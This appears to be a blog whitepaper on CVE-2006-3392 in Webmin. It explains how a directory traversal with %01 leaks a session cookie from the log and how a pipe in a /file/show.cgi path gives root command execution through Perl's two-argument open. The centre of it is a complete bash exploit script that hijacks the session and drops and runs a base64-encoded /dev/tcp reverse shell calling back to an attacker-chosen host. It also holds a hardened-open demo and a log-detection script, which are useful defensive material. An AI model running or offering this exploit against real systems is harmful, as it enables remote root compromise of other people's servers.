
CVE-2006-3392 Whitepaper

Background

Webmin contains two critical vulnerabilities in its Perl codebase. The first is a directory traversal that lets you read arbitrary files, including Webmin's own logs. The second is an authenticated-only command execution bug, running as root, caused by a Perl open-for-read call that accepts a pipe. Chained together: the traversal lets an unauthenticated client read Webmin's log file, which contains a session cookie (I personally thought this part was clever); that cookie hijacks the most recently used login session; and the hijacked session is then the leverage to attack the /file/show.cgi application and run arbitrary code as root.

PoC

First we simply grab the session cookie out of Webmin's log file via the directory traversal, e.g.:

/var/webmin/webmin.log

Note: you'll need the hex character %01 to subvert the directory traversal filtering, e.g.:

..%01/..%01/

Next we'll use the hijacked session to call show.cgi with a | character in the path. This relies on a nuance of Perl's two-argument open: when the filename handed to open ends in a pipe character, Perl runs the string as a command and hands back the command's output instead of the contents of an opened file.
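The open semantics described above, as an added example that is not Webmin's code and not part of the original post: `unsafe_read` uses the two-argument open that treats a trailing `|` as a command, while `safe_read` uses a three-argument open with an explicit read mode, rejects control characters (the `%01` byte from the traversal note decodes to one) and pipe characters, and confines the canonicalised path to a base directory. The base directory `/tmp/webroot_demo`, the file `hello.txt` and the harmless `echo` command are constructed for the demo.

```perl
#!/usr/bin/perl
# Added example (not Webmin's code): two-argument open vs. a confined
# three-argument open. Runs stand-alone with only core modules.
use strict;
use warnings;
use Cwd qw(abs_path);
use File::Spec;

# Assumption: a scratch directory used as the "document root" for the demo.
mkdir '/tmp/webroot_demo' unless -d '/tmp/webroot_demo';
my $BASE = abs_path('/tmp/webroot_demo');

# Vulnerable pattern: two-argument open. The open mode is taken from the
# string itself, so a name ending in '|' is executed as a pipeline and the
# returned "file" contents are the command's standard output.
sub unsafe_read {
    my ($name) = @_;
    open(my $fh, $name) or return undef;   # two-arg open, mode comes from $name
    local $/;                              # slurp mode
    my $data = <$fh>;
    close $fh;
    return $data;
}

# Hardened pattern: refuse control characters (0x00-0x1f, which covers the
# %01 used to dodge the traversal filter) and shell/pipe metacharacters,
# canonicalise the path, confine it to $BASE, and open with an explicit
# '<' mode so the name can never be interpreted as a command.
sub safe_read {
    my ($name) = @_;
    return undef if $name =~ /[\x00-\x1f|<>&;`]/;
    my $path = abs_path(File::Spec->catfile($BASE, $name));
    return undef unless defined $path && index($path, "$BASE/") == 0;
    open(my $fh, '<', $path) or return undef;   # three-arg open, read only
    local $/;
    my $data = <$fh>;
    close $fh;
    return $data;
}

# Constructed fixture: one legitimate file inside the base directory.
open(my $out, '>', "$BASE/hello.txt") or die "cannot write fixture: $!";
print $out "hello\n";
close $out;

# The pipe name uses a harmless echo so the difference is visible safely.
print "unsafe_read('echo from-a-pipe|') -> ", unsafe_read('echo from-a-pipe|');
print "safe_read('echo from-a-pipe|')   -> ",
      (defined safe_read('echo from-a-pipe|') ? 'opened' : 'refused'), "\n";
print "safe_read('hello.txt')           -> ", safe_read('hello.txt');
print "safe_read('../../etc/hostname')  -> ",
      (defined safe_read('../../etc/hostname') ? 'opened' : 'refused'), "\n";
```

The first line prints `from-a-pipe`, which is the output of the echo rather than the contents of any file; the hardened variant refuses both the pipe name and the traversal, and only returns the contents of `hello.txt`. The prefix check on `abs_path` is what stops `..` sequences: they are resolved before the comparison, so no pattern-based filter on the raw string is needed.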

Exploitation

#!/bin/bash
#   __ _  _  __   ___  __  ____ ____
#  /  ( \/ )/ _\ / __)/ _\/ ___(_  _)
# (  O )  (/    ( (_ /    \___ \ )(
#  \__(_/\_\_/\_/\___\_/\_(____/(__)
#
# Requires bash: the reverse shell uses bash's /dev/tcp pseudo-device.

HOST=$1;    # target Webmin host
PORT=$2;    # target Webmin port
LHOST=$3;   # host running the listener (nc -l -p LPORT)
LPORT=$4;   # listener port
if [ $# -lt 4 ]
  then
echo "Webmin <1.29 remote root exploit by oxagast"
echo "Priv esc by directory traversal to find cookie in logfile file as root, then session hijack into RCE.";
echo "Thanks to UmZ for directory traversal attack; greets to enki for asking me to try this!";
echo "Usage:"
echo "  nc -l -p 7777"
echo "  $0 10.0.0.4 10000 10.0.0.3 7777"
else
# Base64-encode the reverse shell so it survives being passed through a URL.
CMD=`echo "bash -p -i >& /dev/tcp/$LHOST/$LPORT 0>&1" | base64`
echo "$CMD";
# Four separate commands, one per show.cgi request.
CMD0="echo $CMD > /tmp/b64s"
CMD1='base64 -d /tmp/b64s > /tmp/she11';
CMD2='chmod a+x /tmp/she11';
CMD3='/bin/bash /tmp/she11';
echo "Webmin <1.29 remote root exploit by oxagast"
echo "Server: $HOST:$PORT";
echo "Getting cookie from webmin log...";
# Directory traversal via %01: read webmin.log unauthenticated and take the
# session id (5th space-separated field) from its last line.
SID=`curl $HOST:$PORT/unauthenticated/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/var/webmin/webmin.log -s | tail -n 1 | cut -f 5 -d ' ' | tr -d '\n'`;
echo "Setting cookie to: sid=$SID";
echo "Copying base64 encoded shell..."
# Each request below reuses the hijacked sid cookie and places a command
# between pipe characters in the show.cgi path (Perl two-argument open).
curl --header "Host: $HOST:$PORT" --header 'User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0' --header 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8' --header 'Accept-Language: en-US,en;q=0.5' --header "Cookie: testing=1; sid=$SID" --header 'Connection: keep-alive' --header 'Upgrade-Insecure-Requests: 1' "$HOST:$PORT/file/show.cgi/bin/AAAF0|$CMD0|" -s -L
sleep 1
echo "Debase64ing shell...";
curl --header "Host: $HOST:$PORT" --header 'User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0' --header 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8' --header 'Accept-Language: en-US,en;q=0.5' --header "Cookie: testing=1; sid=$SID" --header 'Connection: keep-alive' --header 'Upgrade-Insecure-Requests: 1' "$HOST:$PORT/file/show.cgi/bin/AAAF1|$CMD1|" -s -L
sleep 1
echo "Chmodding shell...";
curl --header "Host: $HOST:$PORT" --header 'User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0' --header 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8' --header 'Accept-Language: en-US,en;q=0.5' --header "Cookie: testing=1; sid=$SID" --header 'Connection: keep-alive' --header 'Upgrade-Insecure-Requests: 1' "$HOST:$PORT/file/show.cgi/bin/AAAF2|$CMD2|" -s -L
sleep 1
echo "Trying to spawn...";
curl --header "Host: $HOST:$PORT" --header 'User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0' --header 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8' --header 'Accept-Language: en-US,en;q=0.5' --header "Cookie: testing=1; sid=$SID" --header 'Connection: keep-alive' --header 'Upgrade-Insecure-Requests: 1' "$HOST:$PORT/file/show.cgi/bin/AAAF3|$CMD3|" -s -L
fi
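The two request shapes the script above sends are also what a defender can look for. The following detection script is an added example, not part of the original post or of Webmin: it scans web-server-style access log lines and flags a `..` followed by a control character (the `%01` trick) on a `/unauthenticated/` path, and a `|` character (raw or `%7C`-encoded) inside a `/file/show.cgi/` path. The log lines, client addresses and timestamps are constructed for the example; real Webmin miniserv logs may use a slightly different layout, so the line regex is an assumption to adapt.

```perl
#!/usr/bin/perl
# Added detection example (not part of the original post): flag the request
# shapes used by the CVE-2006-3392 chain in Common Log Format access logs.
use strict;
use warnings;

# Constructed sample log lines (not real traffic).
my @sample = (
  '10.0.0.3 - - [01/Jan/2007:10:00:00 +0000] "GET /unauthenticated/..%01/..%01/..%01/var/webmin/webmin.log HTTP/1.1" 200 5120',
  '10.0.0.3 - - [01/Jan/2007:10:00:02 +0000] "GET /file/show.cgi/bin/AAAF0|echo%20x%20>%20/tmp/b64s| HTTP/1.1" 200 12',
  '10.0.0.9 - - [01/Jan/2007:10:00:05 +0000] "GET /unauthenticated/style.css HTTP/1.1" 200 804',
  '10.0.0.9 - - [01/Jan/2007:10:00:07 +0000] "GET /file/show.cgi/etc/hosts HTTP/1.1" 200 220',
  '10.0.0.3 - - [01/Jan/2007:10:00:09 +0000] "GET /file/show.cgi/bin/AAAF1%7Cbase64%20-d%20/tmp/b64s| HTTP/1.1" 200 12',
);

# Percent-decode one pass so %01 and %7C are compared as the bytes they become.
sub url_decode {
    my ($s) = @_;
    $s =~ s/%([0-9A-Fa-f]{2})/chr hex $1/ge;
    return $s;
}

# Returns a list of [client, reason] pairs; lines that match nothing give an empty list.
sub classify_line {
    my ($line) = @_;
    # Assumption: Common Log Format, request line quoted, method then path then HTTP/x.
    my ($client, $path) = $line =~ /^(\S+) \S+ \S+ \[[^\]]+\] "\w+ (\S+) HTTP/ or return ();
    my $decoded = url_decode($path);
    my @reasons;
    # Traversal: '..' followed by a control byte or a slash under /unauthenticated/.
    push @reasons, 'traversal-with-control-char'
        if $path =~ m{/unauthenticated/} && $decoded =~ m{\.\.[\x00-\x1f/]};
    # show.cgi with a pipe in the path: the two-argument open command shape.
    push @reasons, 'show.cgi-pipe-in-path'
        if $decoded =~ m{/file/show\.cgi/} && $decoded =~ /\|/;
    return map { [$client, $_] } @reasons;
}

sub scan {
    my @hits;
    push @hits, classify_line($_) for @_;
    return @hits;
}

for my $hit (scan(@sample)) {
    printf "%-10s %s\n", @$hit;
}
```

Run against the constructed lines this reports three hits, all from 10.0.0.3: one traversal and two show.cgi pipe requests; the legitimate stylesheet fetch and the plain `/file/show.cgi/etc/hosts` view are left alone. In a real deployment the percent-decoding step matters most, since the same bytes can arrive raw or encoded; a rule matching only the literal `%01` would miss the `%7C` variant and vice versa.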

Good game guys, thanks for playing!

This post is licensed under CC BY 4.0 by the author.